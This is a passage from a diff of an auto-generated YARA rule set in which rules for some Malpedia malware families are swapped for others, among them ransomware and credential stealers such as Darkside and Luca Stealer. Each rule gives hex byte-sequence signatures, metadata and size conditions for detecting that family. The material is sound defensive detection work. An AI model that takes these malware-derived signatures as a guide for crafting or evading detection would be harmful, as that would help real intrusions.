c745d40f000000 c645c000 e8???????? } - $sequence_6 = { 81fae3000000 7cc4 81fa6f020000 7d3a 57 8d3c9518bd4700 } - $sequence_7 = { 68???????? 53 53 ff15???????? 8b55ac 8b4da8 890491 } - $sequence_8 = { ff15???????? 66898435fdfbffff 83c607 53 56 8d85f8fbffff 50 } - $sequence_9 = { 8b45d4 8d4dd8 8b55d0 83ff10 8b7dd8 0f43cf 2bc2 } + $sequence_0 = { ff15???????? 6a00 6a02 83f81f } + $sequence_1 = { 8d95fcfbffff 6800020000 52 e8???????? 83c410 8d85ecfbffff } + $sequence_2 = { 8d85f4feffff 50 56 ffd7 6a00 } + $sequence_3 = { 6a00 52 c685fcfbffff00 e8???????? } + $sequence_4 = { 8b7508 33c0 50 8945f5 668945f9 8845fb 6a07 } + $sequence_5 = { 8945fc 56 57 6a00 6a02 c785ccfdffff28010000 e8???????? } + $sequence_6 = { 6a0d 58 5d c3 8b04cd2cf04000 } + $sequence_7 = { 56 c645f400 ff15???????? 6a00 6a07 8d4df4 } + $sequence_8 = { 4885c0 7419 488d1573750000 488bc8 ff15???????? } + $sequence_9 = { b903000000 f3a6 0f8463010000 33c9 0fb6840c8c000000 } + $sequence_10 = { 33d2 41b82a010000 6689442440 e8???????? ff15???????? 8be8 } + $sequence_11 = { 33c0 e9???????? 48895c2408 4c63c1 488d1d1d890000 4d8bc8 } + $sequence_12 = { 0f85d0000000 488d0d6b380000 ff15???????? 488bf0 4885c0 0f848c010000 } + $sequence_13 = { 488bc8 c744242800000008 c744242003000000 ff15???????? 488bd8 4883f8ff } + $sequence_14 = { f3a6 749a 488d8c24b0030000 33d2 41b868010000 e8???????? } + $sequence_15 = { 488d3d94700000 eb0e 488b03 4885c0 7402 ffd0 4883c308 } condition: - 7 of them and filesize <1068032 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE +rule MALPEDIA_Win_Ramsay_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "34d54537-0c22-56ee-a952-e063e1672ba8" + id = "419ecbad-236d-5c68-9c96-e25af72dd2b4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phoenix_locker_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ramsay_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "30c99eed67f01ec94c0d1a86e9de20b1f5e3b05899cb4448846bf96ce3ca2f7f" + logic_hash = "eb3826746ddecabb3a90d33f9a9bdc63a3e0601a54105640bc672d97b2815450" score = 75 quality = 75 tags = "FILE" @@ -143748,32 +146644,38 @@ rule MALPEDIA_Win_Phoenix_Locker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 480fabc8 48ffc8 4180d05d 488d542420 488b01 66442bc4 } - $sequence_1 = { b91d692dbc 4d0f45e7 4533c9 e8???????? 4c8b6c2438 4c8d442440 413bc7 } - $sequence_2 = { 6681942400000000c64d 66c18c2400000000d9 66c184240000000074 e8???????? e2ac 1234ca 99 } - $sequence_3 = { 4d8d8424b602a3ea 660fbeca 488bcb e9???????? e8???????? 8bd5 498d8c1cb602a3ea } - $sequence_4 = { e9???????? ff15???????? 33c9 4180fa13 3bc1 0f8417000000 488b4c2468 } - $sequence_5 = { 68d30f1c2f 4881842430000000bd5eeb17 66c1bc245800000025 4159 415f 4159 4159 } - $sequence_6 = { 0f8539000000 8d4d39 664181d42122 f9 8d455b 4d63e0 } - $sequence_7 = { 68d701373c 48818424080000003feaebff 55 c0e254 5a 5a c3 } - $sequence_8 = { e8???????? 4881842418000000aa78f72a 488b7c2428 48c74424281256ce88 68d72a8642 48c1a42400000000ef 689b25ad02 } - $sequence_9 = { e8???????? 4155 4151 9c 49b98059c32d64378851 e8???????? 4c0fbbea } + $sequence_0 = { 85c0 7514 ff15???????? 83f820 } + $sequence_1 = { 83f820 7502 eb07 33c0 e9???????? } + $sequence_2 = { ff15???????? 85c0 7502 eb02 ebb1 } + $sequence_3 = { 83c201 8955f8 837df808 731e 8b45f8 } + $sequence_4 = { 894df1 884df5 c745ec00000000 6a06 8d55f0 52 } + $sequence_5 = { 83c404 8945f8 8b4d08 83c101 51 6a00 8b55f8 } + $sequence_6 = { 8b02 ba02000000 f7e2 0f90c1 f7d9 } + $sequence_7 = { 8945f8 837df8ff 7507 33c0 e9???????? 6a00 8b4df8 } + $sequence_8 = { 8a481c 884a15 8b5508 8b4508 } + $sequence_9 = { 3b4d08 732c e8???????? 33d2 b93e000000 } + $sequence_10 = { ff15???????? 85c0 751a 8b4df8 51 } + $sequence_11 = { ff15???????? 33c0 e9???????? e8???????? 85c0 7507 33c0 } + $sequence_12 = { e8???????? eb2b 83f8ff 7526 4c8d253b490100 } + $sequence_13 = { e8???????? eb20 488d542470 488d0d1afa0100 e8???????? 4533c0 33d2 } + $sequence_14 = { e8???????? eb2d 4863442468 488b4c2458 } + $sequence_15 = { e8???????? eb31 488b8c2428110000 e8???????? } condition: - 7 of them and filesize <3702784 + 7 of them and filesize <2031616 } -rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE +rule MALPEDIA_Win_Ehdevel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "db565cb3-5b9a-5302-b069-7b70d89c0685" + id = "df8239a0-64d7-5d90-a037-26c4b02b8a9b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.erbium_stealer_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ehdevel_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "a012e65d267d16fa63c21194de269ccb3721cbb6b9dd72f9bc3dc93b5920b64d" + logic_hash = "959b6347dd7f394fa1dd74e2d5d70bd613b6731b1cc6dbc8f1a7abb3467a3ebd" score = 75 quality = 75 tags = "FILE" @@ -143787,32 +146689,32 @@ rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b55f4 52 ff15???????? 898578ffffff 8b450c 0fb708 } - $sequence_1 = { e9???????? b808000000 6bc809 8b55f4 837c0a6400 7448 b808000000 } - $sequence_2 = { 6a04 ff7508 8d4df8 ff75e4 ff75e0 6a00 } - $sequence_3 = { 8d8424a0000000 7409 83c002 66833800 } - $sequence_4 = { 6a00 6800100000 68???????? 8b45e8 } - $sequence_5 = { ff15???????? eb08 33c0 eb04 8b442414 33ff 33db } - $sequence_6 = { 8b11 81e200000080 741a 8b45f0 8b08 81e1ffff0000 } - $sequence_7 = { 8955f8 b808000000 6bc805 8b55f4 } - $sequence_8 = { 897dfc 3bf8 7455 0fb74f2c } - $sequence_9 = { 83c102 51 8b55d0 52 ff55cc 8b4de8 8901 } + $sequence_0 = { 51 e8???????? e9???????? 33d2 68fe070000 52 8d85feefffff } + $sequence_1 = { 7545 56 c70303000000 ff15???????? 56 ff15???????? 68???????? } + $sequence_2 = { 8d8dcce7ffff 51 6a00 6813000020 56 c785cce7ffff00000000 c785c8e7ffff04000000 } + $sequence_3 = { 8d85f0e7ffff 50 56 6a00 6a10 6a02 ff15???????? } + $sequence_4 = { e8???????? 83c404 33c9 6a08 b8???????? } + $sequence_5 = { 8d8dd4e5ffff 51 8d95f8f7ffff 6800040000 52 e8???????? } + $sequence_6 = { 83c410 8b4d0c 8d442408 50 51 } + $sequence_7 = { 83d8ff 85c0 0f84cffdffff 68???????? 6800040000 57 e8???????? } + $sequence_8 = { 50 e8???????? 8d8c24d4190000 51 8d9424d8010000 6800040000 52 } + $sequence_9 = { 8db564f7ffff e8???????? 33d2 899de8f7ffff 89bde4f7ffff 668995d4f7ffff 33c0 } condition: - 7 of them and filesize <33792 + 7 of them and filesize <524288 } -rule MALPEDIA_Win_Paladin_Auto : FILE +rule MALPEDIA_Win_Darkside_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8e8ee0fc-daaf-5adf-960f-9f0ec8622d0d" + id = "4e98e522-42dc-58c9-8c11-9325d3b56f3a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.paladin_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkside_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "421e228bfdffaff271db99688d25ef5b69f4b46e3f813d9e9b328d48850dca52" + logic_hash = "e40a0efe65c9a50695ac0381c3b73c18492ef0b0fce9893dbb25777c239f867f" score = 75 quality = 75 tags = "FILE" @@ -143826,34 +146728,34 @@ rule MALPEDIA_Win_Paladin_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c20800 8d5d04 50 52 } - $sequence_1 = { ffd7 8b4614 6aff 50 ffd7 8b4e10 } - $sequence_2 = { 0faff0 83c61f c70728000000 c1fe03 83e6fc 894704 0faff1 } - $sequence_3 = { 53 55 56 8bf1 57 b918000000 33c0 } - $sequence_4 = { 33c0 8a41ff 8d1440 8d1492 8d1492 8d1cd0 33d2 } - $sequence_5 = { 687f030000 6a00 68???????? 8bf0 } - $sequence_6 = { 33c0 8dbc24a0000000 33d2 899c249c000000 83c40c 89942484000000 f3ab } - $sequence_7 = { 81c468020000 c20400 53 c645002e bb01000000 eb04 8b742414 } - $sequence_8 = { 8b4518 83f804 7427 83f802 7422 83f806 741d } - $sequence_9 = { 83f80d 0f8661010000 eb04 8b6c2410 } + $sequence_0 = { 8bd8 68ff000000 57 e8???????? 81c7ff000000 } + $sequence_1 = { 85d2 7407 52 57 } + $sequence_2 = { b9ff000000 33d2 f7f1 85c0 7418 } + $sequence_3 = { 57 e8???????? 81c7ff000000 4b } + $sequence_4 = { fec1 75d2 5f 5e 5a 59 5b } + $sequence_5 = { 56 57 b9f0000000 be???????? } + $sequence_6 = { 8b7d08 8b450c b9ff000000 33d2 f7f1 } + $sequence_7 = { 56 57 b9f0000000 be???????? 8b4508 } + $sequence_8 = { e8???????? 5f 5e 5a 59 5b 5d } + $sequence_9 = { 81ea10101010 2d10101010 81eb10101010 81ef10101010 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Petrwrap_Auto : FILE +rule MALPEDIA_Win_R980_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "335058f1-6093-5213-b714-ccf692d43a50" + id = "5cd23ce7-fde9-586e-b7d0-c68d0d4730a5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.petrwrap_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.r980_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "3085058da5fe07c21c7301994557a19255100cfc23f593064f4716726b348a1c" + logic_hash = "6631f2c285d8397109ba8d7d2192a7dc1832567dbf3b5dac3dd0d91311ae325e" score = 75 - quality = 75 + quality = 45 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -143865,32 +146767,32 @@ rule MALPEDIA_Win_Petrwrap_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7e9 c1fa02 8bc2 c1e81f 40 03c2 687f010000 } - $sequence_1 = { 136c2414 894c2428 8b4c246c 896c2420 8d4960 e8???????? 8b4c2440 } - $sequence_2 = { 50 57 57 c744242400000000 c744242800000000 c744242c00000000 c744243800000000 } - $sequence_3 = { 8b7c2418 f7c3fcffffff 0f8496000000 897c2420 8d4900 6a00 56 } - $sequence_4 = { 53 53 896c2448 8844241f 660fd6442454 e8???????? 83c40c } - $sequence_5 = { 8bca 83d100 01460c 8b442424 83d100 83c310 83ed04 } - $sequence_6 = { 89460c 8b06 53 55 8b2f 8b7f04 33db } - $sequence_7 = { 8b7c2444 33fb 237c2434 23cb } - $sequence_8 = { 897db0 6a00 ff75c8 ff55d8 6a00 6a16 } - $sequence_9 = { 7f04 8bc5 eb0e 56 55 e8???????? 8b54242c } + $sequence_0 = { 51 8d4dd4 e8???????? 837de810 8d45d4 53 0f4345d4 } + $sequence_1 = { e8???????? 56 8b08 8b01 ff5070 56 50 } + $sequence_2 = { 8d4dbc e8???????? 8d4dd4 e8???????? 8d4da4 e8???????? 8b4df4 } + $sequence_3 = { 85c0 7409 ff7608 50 e8???????? c7460800000000 c7460400000000 } + $sequence_4 = { 50 e8???????? 8bce e8???????? 8b4d1c 83c418 } + $sequence_5 = { 8bc7 f00fc14104 7515 8b01 ff10 8b4db4 8bc7 } + $sequence_6 = { ff4654 837e5440 750c c7465400000000 e8???????? 8b4658 83f8f8 } + $sequence_7 = { e8???????? 83ec18 8d8424c0000000 8bcc 50 e8???????? e9???????? } + $sequence_8 = { 8bc8 e8???????? 33c9 894ddc 8b448dc8 0f57c0 41 } + $sequence_9 = { c745fc00000000 8b30 8d45ec 50 e8???????? 83c404 8d4dec } condition: - 7 of them and filesize <1024000 + 7 of them and filesize <3178496 } -rule MALPEDIA_Win_Mangzamel_Auto : FILE +rule MALPEDIA_Win_Excalibur_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "efd17f11-bd84-5994-8489-ce27d4f0f0e6" + id = "2f6333bc-c895-5bb8-bab8-691e82e18cbb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mangzamel_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.excalibur_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e3b6cc187254084e27045992bdf0d8b8ff879105635bf8f3e82d14e2723774a4" + logic_hash = "2c11504edbec5bcce0250be14d19518961ccd4df7434fa2cf5c1fc07833012b8" score = 75 quality = 75 tags = "FILE" @@ -143904,32 +146806,32 @@ rule MALPEDIA_Win_Mangzamel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b7508 837e1410 7404 32c0 eb6e 8b06 53 } - $sequence_1 = { 8d8dd4feffff e8???????? 33db 8d8dc0fdffff 895dfc e8???????? 8d85d4feffff } - $sequence_2 = { 6a00 8bce ff7674 e8???????? 6a01 6804000102 8bce } - $sequence_3 = { ff7508 e8???????? 84c0 7404 c645f301 8b4df4 } - $sequence_4 = { 8bd0 8b00 8b5208 3932 7506 837a0400 } - $sequence_5 = { e8???????? 33c0 8bce 50 50 50 ff742414 } - $sequence_6 = { 8bce ff7508 ff5040 8ac3 5e 5b 5d } - $sequence_7 = { 57 8b7c2414 33c0 8907 8b0d???????? 3bc8 } - $sequence_8 = { 8d4b6c e8???????? 5e 5b c3 56 8bf1 } - $sequence_9 = { 8b74240c 57 8b7c240c 8d4602 50 57 e8???????? } + $sequence_0 = { 50 c745fc00000000 e8???????? c645fc01 8bbdece5ffff 8b9dd8e5ffff 8d8dd8e5ffff } + $sequence_1 = { 884c241f b90f000000 c644242000 0f57c0 660fd6442420 8d442420 83f910 } + $sequence_2 = { 50 e8???????? 8b55e4 83c40c 6bd230 8d8210074400 8945e4 } + $sequence_3 = { 7514 8b4738 8b4f3c 8902 8b471c 8908 8b472c } + $sequence_4 = { 99 2bc2 8b5508 d1f8 2b14c5605f4300 7413 85d2 } + $sequence_5 = { 80b86004440000 74e9 8b5ddc 0fb606 0fbe8060044400 85c0 7510 } + $sequence_6 = { 6689141e 8945f8 46 03f6 0fb7141e 81ff00000001 7314 } + $sequence_7 = { c645fc01 8bbdece5ffff 8b9dd8e5ffff 8d8dd8e5ffff 83ff10 0f43cb 6a00 } + $sequence_8 = { 8bb540e5ffff e9???????? 8bb540e5ffff e9???????? 8b8530e5ffff 8b0485c0324400 f644060480 } + $sequence_9 = { 8975fc 8b45e0 8b0485c0324400 f644030401 7428 57 e8???????? } condition: - 7 of them and filesize <360448 + 7 of them and filesize <1253376 } -rule MALPEDIA_Win_Cova_Auto : FILE +rule MALPEDIA_Win_Unidentified_068_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0c88fb7f-6fc3-555b-938b-30689bfedd71" + id = "5159a6d8-1e34-506d-99d9-cd809f096743" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cova" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cova_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_068_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "5acada90a087ad54806fe6fafb57fbcd69c3ce6e348c87bed79cabfe21474d32" + logic_hash = "89cc05fc50aa07230f88b9a05ad2adeb94c446a13f619795648893388c9d8285" score = 75 quality = 75 tags = "FILE" @@ -143943,34 +146845,34 @@ rule MALPEDIA_Win_Cova_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b430c 8905???????? 8bd7 4c8d0558bbffff } - $sequence_1 = { eb7c 4c8d258e800000 488b0d???????? eb6c } - $sequence_2 = { 4881c354020000 83fe06 7298 488d8d70040000 baf80d0000 } - $sequence_3 = { 3d80000000 751d 4c8be6 448bfe 4839742450 7419 ff5500 } - $sequence_4 = { 4863ca 0fb7444b10 664189844898c90000 ffc2 } - $sequence_5 = { 488b0d???????? e9???????? 4c8d25a6800000 488b0d???????? } - $sequence_6 = { eb06 8d4257 418800 ffc2 49ffc0 83fa10 } - $sequence_7 = { e8???????? 482be0 488b05???????? 4833c4 48898510170000 488dbde0000000 } - $sequence_8 = { ff15???????? 488d1574260000 488bce 488905???????? ff15???????? } - $sequence_9 = { 41bc14030000 4c8d0520320000 488bcd 418bd4 } + $sequence_0 = { 75ee 394624 7417 50 8bce e8???????? } + $sequence_1 = { 43 8bc8 3bde 72e6 8b75e0 8b5df4 8b55f8 } + $sequence_2 = { 85ff 741b 8b4674 ff7514 8b0c98 83c118 e8???????? } + $sequence_3 = { 59 57 8bd8 c745fc04000000 8d45fc 50 53 } + $sequence_4 = { 7406 8b08 50 ff5108 885d94 895df0 8d4df0 } + $sequence_5 = { 8d5648 8d4d88 e8???????? 59 83781408 7202 8b00 } + $sequence_6 = { 660f13442450 8b4c2454 894c2458 8b4c2450 894c2450 8b4c2464 894c2428 } + $sequence_7 = { d1f9 6a41 5f 894df0 8b34cd18aa4400 8b4d08 6a5a } + $sequence_8 = { 72ba 33f6 81fb10000020 0f45f3 85f6 7523 33db } + $sequence_9 = { 8d4948 e8???????? 33c0 5d c20800 55 8bec } condition: - 7 of them and filesize <123904 + 7 of them and filesize <862208 } -rule MALPEDIA_Win_Victorygate_Auto : FILE +rule MALPEDIA_Win_Smanager_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "992c5b2e-f41c-5577-b26b-d319a12e38e1" + id = "7788af6d-844d-509b-90a8-b8ca5df742b1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.victorygate_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smanager_auto.yar#L1-L224" license_url = "N/A" - logic_hash = "ea38784ac607c199e10f70edff21cb5ba2438f5fbaa9d25c8260862ff3bec34e" + logic_hash = "7070ed4ef9fc0031fffb8ae0d3a2a122913a3a51a0e1a419190de42eef9b5039" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -143982,32 +146884,46 @@ rule MALPEDIA_Win_Victorygate_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7214 8b49fc 83c223 2bc1 83c0fc 83f81f 0f879a120000 } - $sequence_1 = { 8bce c645fc08 e8???????? c645fc01 8b55e8 83fa10 7228 } - $sequence_2 = { 8bf8 893b 897b04 03cf 33c0 894b08 eb03 } - $sequence_3 = { ff15???????? 85c0 0f8593010000 ff75f8 8d8678020000 6a57 50 } - $sequence_4 = { e9???????? 3b0d???????? 7501 c3 e9???????? 55 8bec } - $sequence_5 = { 0f8537050000 ff75f8 8d8630020000 6a32 50 } - $sequence_6 = { 85c0 7537 b901000000 f00fb10f 85c0 7533 817e340c2b0000 } - $sequence_7 = { 8b4128 8b7124 8945b8 3bf0 7436 660f1f440000 8b06 } - $sequence_8 = { 57 8b00 8945c4 663908 0f8548060000 8b703c 03f0 } - $sequence_9 = { c745fc19000000 83ec18 8b4de0 8bc4 896584 c70000000000 c7401000000000 } + $sequence_0 = { 6a0d e8???????? 83c404 8bf0 } + $sequence_1 = { 51 ffd0 83c40c c7460800000000 } + $sequence_2 = { 7410 6a00 6a00 6830001100 } + $sequence_3 = { 8b7604 6a00 6a00 56 68???????? 6a00 6a00 } + $sequence_4 = { 8b4608 85c0 7420 a801 7515 } + $sequence_5 = { 8b4510 85c0 7407 50 ff15???????? } + $sequence_6 = { 68???????? 6a00 6a00 ff15???????? 8bf8 897e28 } + $sequence_7 = { 83c602 6a22 56 e8???????? 83c408 } + $sequence_8 = { ff15???????? 32c0 e9???????? 0f1005???????? } + $sequence_9 = { 0007 b15a 0007 b15a } + $sequence_10 = { 0000 80ed4a 0044feff ff900100008c } + $sequence_11 = { 4c8d9c24d0010000 498b5b28 498b7330 498b7b38 498be3 415f } + $sequence_12 = { 41c7430800000000 488d59b0 488d0532730100 498943e0 488d0537730100 } + $sequence_13 = { 0008 53 4f 00ef } + $sequence_14 = { 4885c0 7463 41b80f000000 488d159ab90100 488bc8 e8???????? } + $sequence_15 = { 44894de9 66448955f1 418bc8 8bc2 4c8d0de10b0100 c1e918 } + $sequence_16 = { 488bf8 448b842480000000 33d2 488bc8 e8???????? 4533f6 } + $sequence_17 = { 0007 b15a 00c4 b15a } + $sequence_18 = { 41b803000000 488d0d908e0000 4533c9 ba00000040 4489442420 ff15???????? } + $sequence_19 = { 0003 b157 0000 0c0c } + $sequence_20 = { 0007 b15a 0089b05a0089 b05a } + $sequence_21 = { 7404 b301 eb03 448937 } + $sequence_22 = { 0001 ce 50 0008 } + $sequence_23 = { 0000 0c0c 0c0c 0c0c 0c0c 0c0c 0102 } condition: - 7 of them and filesize <1209344 + 7 of them and filesize <10013696 } -rule MALPEDIA_Win_Silon_Auto : FILE +rule MALPEDIA_Win_Luca_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "74e356eb-e3ab-55df-a58b-86af4144d8aa" + id = "8a0c166d-37f3-5a13-bfc2-83fc09a4679d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.silon_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.luca_stealer_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e4ecb086584bedec65219eab1069013db28049e75ec56b31d70ca83f4cf849d8" + logic_hash = "f2eabac635b7bb4e193cfff7279ec9fd429ac964f492c856eb49bfd67aa7534f" score = 75 quality = 75 tags = "FILE" @@ -144021,32 +146937,32 @@ rule MALPEDIA_Win_Silon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83ec18 c745f000000000 c745f400000000 c745f800000000 33c0 8945fc } - $sequence_1 = { 83c408 8945f4 837df400 7507 33c0 e9???????? c745f800000000 } - $sequence_2 = { 81ec3c020000 c785c4fdffff00000000 c745fc00000000 c745f800000000 837d0800 } - $sequence_3 = { 0fbe11 83fa61 7c20 8b4508 0345fc 0fbe08 83f97a } - $sequence_4 = { 8b4d0c 8b55f8 895104 8b45f4 50 e8???????? 83c404 } - $sequence_5 = { 6a00 8d8df4feffff 51 8d95f8feffff 52 6a01 8b4508 } - $sequence_6 = { 50 e8???????? 83c408 eb61 8b4d08 } - $sequence_7 = { e8???????? 83c404 8b55fc 52 e8???????? 83c404 8945ec } - $sequence_8 = { 8b5508 8955e8 837de800 7507 33c0 e9???????? 8b45e8 } - $sequence_9 = { 5d c20c00 ff25???????? 60 33c9 8b742424 33c0 } + $sequence_0 = { e8???????? 488bf8 81e7ffffff3f 498b4e60 488b5910 4885db 7452 } + $sequence_1 = { f645ef02 741d 807df101 7417 b201 488d4de7 e8???????? } + $sequence_2 = { eb06 4531c0 4889d0 48c7837802000002000000 44888380020000 c6838102000000 48898388020000 } + $sequence_3 = { e8???????? 498b0f 498b4708 4983670800 4885c0 740f 4883c420 } + $sequence_4 = { ff15???????? 894530 85c0 0f842b520000 488dbd501f0000 8b0f e8???????? } + $sequence_5 = { e8???????? 85c0 0f85be000000 488bcb e8???????? 488b8798090000 498bce } + $sequence_6 = { e8???????? 85c0 740c 488b0b 8a0439 2c3a 3c01 } + $sequence_7 = { e9???????? 488d3515b8d8ff eb03 4d03fd 410fb607 4484ac30009e4100 75ef } + $sequence_8 = { e9???????? b009 eb4f 488b842490000000 66c7000109 e9???????? 488db424e0000000 } + $sequence_9 = { eb86 e8???????? 0f0b 4157 4156 4155 4154 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <9285632 } -rule MALPEDIA_Win_Downeks_Auto : FILE +rule MALPEDIA_Win_Hunter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "45e36078-208a-5456-a83d-718f8ea60024" + id = "a2ce8975-358a-5feb-855e-0c18799189f7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.downeks_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hunter_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "f8eb51f40370e6583f97bf6d6b06a56caeeec4252d81205dee3da42852ee5b8c" + logic_hash = "4840112788d43f80efa44bf4553c38cceb240b146b43c82ea7ba535d388455f9" score = 75 quality = 75 tags = "FILE" @@ -144060,32 +146976,32 @@ rule MALPEDIA_Win_Downeks_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 8b8ddcfeffff 51 ff15???????? 8b8de0feffff 53 } - $sequence_1 = { c3 8b4108 c3 b8ccd00904 c3 8bff 55 } - $sequence_2 = { 8d4da0 e8???????? 8b4704 85c0 7409 83f8ff 7304 } - $sequence_3 = { e8???????? 8bd8 83c40c 85db 0f85cf000000 8b55c0 85d2 } - $sequence_4 = { 2bce 51 8bce 2b4d80 8d75a8 8d558c e8???????? } - $sequence_5 = { e9???????? 8d75b4 e9???????? 8d75d0 e9???????? 8bb560ffffff e9???????? } - $sequence_6 = { c785e8faffff07000000 89b5e4faffff 668995d4faffff e8???????? 8975fc 80fb5c 740a } - $sequence_7 = { c1ea08 0fb6d2 8b3c95a0c20804 0fb6d0 8b1495a0c60804 c1e808 0fb6c0 } - $sequence_8 = { ff15???????? 8bf0 83c42c 85f6 0f8547feffff 8b45f0 50 } - $sequence_9 = { 7488 8b4d0c 833900 7502 8901 8b4d10 8b13 } + $sequence_0 = { 8d4323 03c8 8d83b5000000 038d3cffffff 03c8 8d83ae000000 03ce } + $sequence_1 = { 8b5f08 8b440104 8945f0 8b13 8bc8 e8???????? 85c0 } + $sequence_2 = { 8d4b38 0faf4dbc 898d34fdffff 8b8d1cffffff 0fafce 8d7375 898d8cfeffff } + $sequence_3 = { 8bf9 6b1f14 8b743b0c eb38 0fbf0475080f4700 83f8c2 7433 } + $sequence_4 = { 